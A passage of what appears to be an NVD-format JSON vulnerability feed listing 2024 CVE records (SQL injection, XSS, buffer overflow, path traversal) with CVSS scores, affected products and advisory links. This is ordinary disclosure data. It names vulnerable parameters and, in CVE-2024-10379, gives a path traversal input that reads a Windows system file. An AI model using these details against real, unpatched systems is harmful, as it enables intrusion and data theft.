Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /addstock.php. The manipulation of the argument prodtype leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:sales_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T02:15Z", "lastModifiedDate" : "2024-10-30T16:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10369", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/18", "name" : "https://github.com/ppp-src/CVE/issues/18", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281761", "name" : "VDB-281761 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281761", "name" : "VDB-281761 | Codezips Sales Management System addcustcom.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.430115", "name" : "Submit #430115 | Codezips Sales Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Codezips Sales Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /addcustcom.php. The manipulation of the argument refno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:sales_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T02:15Z", "lastModifiedDate" : "2024-10-30T16:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1037", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32", "name" : "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50", "name" : "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php", "name" : "https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32", "name" : "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php", "name" : "https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50", "name" : "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50", "refsource" : "", "tags" : [ "Issue Tracking" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The All-In-One Security (AIOS) – Security and Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:updraftplus:all-in-one_security:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "5.2.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-07T07:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10370", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/19", "name" : "https://github.com/ppp-src/CVE/issues/19", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281762", "name" : "VDB-281762 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281762", "name" : "VDB-281762 | Codezips Sales Management System addcustind.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.430607", "name" : "Submit #430607 | Codezips Sales Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Codezips Sales Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /addcustind.php. The manipulation of the argument refno leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:sales_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T02:15Z", "lastModifiedDate" : "2024-10-30T16:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10371", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-120" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/CveSecLook/cve/issues/63", "name" : "https://github.com/CveSecLook/cve/issues/63", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281763", "name" : "VDB-281763 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281763", "name" : "VDB-281763 | SourceCodester Payroll Management System main login buffer overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.430175", "name" : "Submit #430175 | SourceCodester Payroll Management System in C++ with Source Code 1.0 Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in SourceCodester Payroll Management System 1.0. This affects the function login of the file main. The manipulation leads to buffer overflow. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:razormist:payroll_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T02:15Z", "lastModifiedDate" : "2024-10-30T14:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10372", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/Startr4ck/CVE_lists/blob/main/buzz/Insecure%20Temporary%20File%20in%20BUZZ.md", "name" : "https://github.com/Startr4ck/CVE_lists/blob/main/buzz/Insecure%20Temporary%20File%20in%20BUZZ.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281764", "name" : "VDB-281764 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281764", "name" : "VDB-281764 | chidiwilliams buzz model_loader.py download_model temp file", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425441", "name" : "Submit #425441 | Github buzz 1.1.0 Insecure Temporary File in chidiwilliams / buzz", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in chidiwilliams buzz 1.1.0. This vulnerability affects the function download_model of the file buzz/model_loader.py. The manipulation leads to insecure temporary file. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:chidiwilliams:buzz:1.1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L", "attackVector" : "LOCAL", "attackComplexity" : "HIGH", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 3.6, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.0, "impactScore" : 2.5 } }, "publishedDate" : "2024-10-25T02:15Z", "lastModifiedDate" : "2024-11-06T16:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10374", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5ea93a49-0e1a-4a24-8f6b-03e624f517d4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5ea93a49-0e1a-4a24-8f6b-03e624f517d4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/wp-members/#developers", "name" : "https://wordpress.org/plugins/wp-members/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3172530/", "name" : "https://plugins.trac.wordpress.org/changeset/3172530/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpmem_loginout shortcode in all versions up to, and including, 3.4.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:butlerblog:wp-members:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.4.9.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-25T12:15Z", "lastModifiedDate" : "2024-10-31T00:00Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10376", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/127494ce-0d4c-4773-9fc0-810e26841c4b?code=G8A6P3", "name" : "https://flowus.cn/share/127494ce-0d4c-4773-9fc0-810e26841c4b?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281806", "name" : "VDB-281806 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281806", "name" : "VDB-281806 | ESAFENET CDG AutoSignService.java actionPassOrNotAutoSign sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.426083", "name" : "Submit #426083 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ESAFENET CDG 5. It has been declared as critical. This vulnerability affects the function actionPassOrNotAutoSign of the file /com/esafenet/servlet/service/processsign/AutoSignService.java. The manipulation of the argument UniqueId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T11:15Z", "lastModifiedDate" : "2024-11-05T19:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10377", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/1234f712-c774-4a26-a922-809e0a356405?code=G8A6P3", "name" : "https://flowus.cn/share/1234f712-c774-4a26-a922-809e0a356405?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.281807", "name" : "VDB-281807 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281807", "name" : "VDB-281807 | ESAFENET CDG DecryptApplicationService.java actionPassDecryptApplication1 sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.426085", "name" : "Submit #426085 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ESAFENET CDG 5. It has been rated as critical. This issue affects the function actionPassDecryptApplication1 of the file /com/esafenet/servlet/client/DecryptApplicationService.java. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This is a different issue than CVE-2024-10069. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T11:15Z", "lastModifiedDate" : "2024-11-05T19:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10378", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/5d03f1d5-695a-421b-8445-2273774ea97a?code=G8A6P3", "name" : "https://flowus.cn/share/5d03f1d5-695a-421b-8445-2273774ea97a?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.281808", "name" : "VDB-281808 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281808", "name" : "VDB-281808 | ESAFENET CDG CDGRenewApplicationService.java actionViewCDGRenewFile sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.426086", "name" : "Submit #426086 | ESAFENET CDG V5 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in ESAFENET CDG 5. Affected is the function actionViewCDGRenewFile of the file /com/esafenet/servlet/client/CDGRenewApplicationService.java. The manipulation of the argument CDGRenewFileId leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T12:15Z", "lastModifiedDate" : "2024-10-30T23:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10379", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://flowus.cn/share/0b03c61a-76a5-4f45-9ee7-a88e0f21d539?code=G8A6P3", "name" : "https://flowus.cn/share/0b03c61a-76a5-4f45-9ee7-a88e0f21d539?code=G8A6P3", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.281809", "name" : "VDB-281809 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281809", "name" : "VDB-281809 | ESAFENET CDG DecryptApplicationService.java actionViewDecyptFile path traversal", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.426087", "name" : "Submit #426087 | ESAFENET CDG V5 Exposure of Sensitive Information Through Data Queries", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in ESAFENET CDG 5. Affected by this vulnerability is the function actionViewDecyptFile of the file /com/esafenet/servlet/client/DecryptApplicationService.java. The manipulation of the argument decryptFileId with the input ../../../Windows/System32/drivers/etc/hosts leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The affected function has a typo and is missing an R. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:esafenet:cdg:5:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-25T12:15Z", "lastModifiedDate" : "2024-10-30T18:54Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1038", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js#L1578", "name" : "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js#L1578", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/js/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js", "name" : "https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/js/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js#L1578", "name" : "https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js#L1578", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/js/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js", "name" : "https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/js/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via a 'playground.wordpress.net' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fastlinemedia:beaver_builder:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding" : "2.7.4.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : 